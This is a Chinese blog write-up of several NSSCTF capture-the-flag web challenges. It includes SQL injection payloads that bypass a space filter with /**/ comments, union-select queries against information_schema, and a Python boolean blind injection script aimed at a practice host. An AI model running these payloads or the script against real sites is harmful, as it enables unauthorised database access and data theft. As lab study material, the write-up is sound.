NSSCTF第11页（2）

[FSCTF 2023]webshell是啥捏

直接复制传参发现然后命令执行发现成功了。。。。

cat /flag.txt

[NSSCTF 2022 Spring Recruit]babysql

提示是sql注入，空格绕过，试一下

看到了黑名单

利用/**/来代替空格

 1'/**/union/**/select/**/database()/**/'

paylaod:

1'union/**/select/**/(select/**/group_concat(flag)/**/from/**/flag)/**/'

(select group_concat(flag) from flag)是一个子查询，用于从名为"flag"的表中获取flag列的所有值，并使用group_concat函数将这些值合并为一个逗号分隔的字符串。

得到flag

也可以利用布尔盲注脚本

import requests

asc_str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
burp0_url = "http://node5.anna.nssctf.cn:28621/"
burp0_headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded"
    }
content = ''

for pos in range(1, 100):
    min_num = 32
    max_num = 126
    mid_num = (min_num + max_num) // 2
    while (min_num < max_num):
        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{},1))>{})/**/!=!/**/'1".format(pos, mid_num)
        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test'),{},1))>{})/**/!=!/**/'1".format(pos, mid_num)
        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),{},1))>{})/**/!=!/**/'1".format(pos, mid_num)
        payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),{},1))>{})/**/!=!/**/'1".format(
            pos, mid_num)
        burp0_data = {"username": payload}  # tarnish是题目给的要求
        resp = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
        if 'string(39)' in resp.text:
            min_num = mid_num + 1
        else:
            max_num = mid_num
        mid_num = (min_num + max_num) // 2
    content += chr(min_num)
    print(content)

 

还可以利用异或进行注入，第一次听说，给大家一篇大佬的博客

[NSSCTF 2022 Spring Recruit]babysql_末初的技术博客_51CTO博客

[MoeCTF 2022]Sqlmap_boy 

 看源代码看到了sql语句

 分析一下，闭合方式为双引号闭合
那么我们试试万能语句

发现进来了

secrets.php?id=-1' union select 1,2,3 --+ 

看回显位

 secrets.php?id=-1' union select 1,2,database() --+

查库

查表

secrets.php?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'moectf' --+ 

查列

查字段内容，得到flag

没什么过滤就是要注意最后的注释，用#不行

[网鼎杯 2018]Fakebook

这道题先放掉，因为sql和反序列化都不是很强

[MoeCTF 2021]Do you know HTTP

提示说试试bp

让改请求方式

  回显说：只有本地ip地址才可以哦！ 

构造xff，到xff怎么都不显示了，不知道是什么问题，我看评论区也有这种问题